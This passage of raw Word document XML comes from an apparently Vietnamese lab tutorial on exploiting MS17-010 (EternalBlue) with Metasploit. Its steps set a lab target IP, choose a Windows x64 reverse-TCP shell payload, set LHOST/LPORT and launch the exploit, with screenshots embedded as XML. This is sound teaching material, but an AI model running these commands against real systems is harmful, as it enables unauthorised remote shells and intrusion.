        <w:t xml:space="preserve">Để tìm kiếm các module khai thác lỗ hổng của một lỗ hổng bảo mật </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>được  MS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>17.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18955435" wp14:editId="33CC29A1">
            <wp:extent cx="4862945" cy="3827275"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1595147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7501" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4863571" cy="3827768"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="2520"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc130209113"/>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17</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. sử dụng câu lệnh: search ms17</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sử dụng câu lệnh dưới để khai thác lỗ hỗng ms17:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A65DE0E" wp14:editId="71048D62">
            <wp:extent cx="5760720" cy="358935"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1666311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1875" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="358935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sau đó chúng ta sẽ show các options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56B0E1AF" wp14:editId="5ACEE4CB">
            <wp:extent cx="5112327" cy="4169223"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1939838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73" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5112624" cy="4169465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="3060"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc130209114"/>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18</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. khai thác lỗ hỗng ms17</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Chúng ta có thể thấy được trong module options có rất nhiều lựa chọn để cho chúng ta thiết lập để tấn công máy nạn nhân. Chúng ta sẽ thiết lập IP cho RHOSTS để tấn công vào máy mục tiêu. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.80.136</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E2C2101" wp14:editId="0DFAF45D">
            <wp:extent cx="5760720" cy="1840000"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="8595054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5459" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1840000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="2700"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc130209115"/>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19</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. thiết lập ip cho rhosts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Xem danh sách options có sẵn trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau đó chúng ta sẽ tìm những payloads phù hợp với mục đích tấn công này. Ở đây chúng tôi sẽ dụng: set payload windows/x64/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F7D54D2" wp14:editId="362BEF9B">
            <wp:extent cx="5745480" cy="75744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4757" cy="761303"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:ind w:firstLine="3240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc130209116"/>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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. show payloads</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E93D5C4" wp14:editId="187C8C7C">
            <wp:extent cx="5737860" cy="505644"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="560962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2251" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId12"/>
                    <a:srcRect r="25314"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5739123" cy="505755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="3060"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc130209117"/>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21</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. show payloads</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D262113" wp14:editId="3ACFC04D">
            <wp:extent cx="5687290" cy="2391572"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="85285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13"/>
                    <a:srcRect r="23639"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5687655" cy="2391725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="1620"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc130209118"/>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22</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. set payload windows/x64/shell/reverse_tcp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F11211D" wp14:editId="5F3038E3">
            <wp:extent cx="5737860" cy="1707569"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="320431494" name="Hình ảnh 32043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13"/>
                    <a:srcRect t="52055" r="48267"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5741729" cy="1708720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="1800"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc130209119"/>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23</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.options có sẵn trong ms17_010_eternalblue</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bước 5:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Chúng ta đã thiết lập LHOST là địa chỉ IP của máy tấn công và LPORT sẽ là cổng mà kẻ tấn công sẽ đi qua. Lúc này chúng tôi đã thiết lập xong hết và giờ sẽ là exploit máy victim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5803571F" wp14:editId="1332275E">
            <wp:extent cx="4772890" cy="3072818"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1655231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402" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4773871" cy="3073449"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc130209120"/>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24</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. đã thiết lập lhost là địa chỉ IP của máy tấn công</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="061CF23B" wp14:editId="1F8573F0">
            <wp:extent cx="4772660" cy="4041229"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="85801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987" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="11936"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4774963" cy="4043179"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="3060"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc130209121"/>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25</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
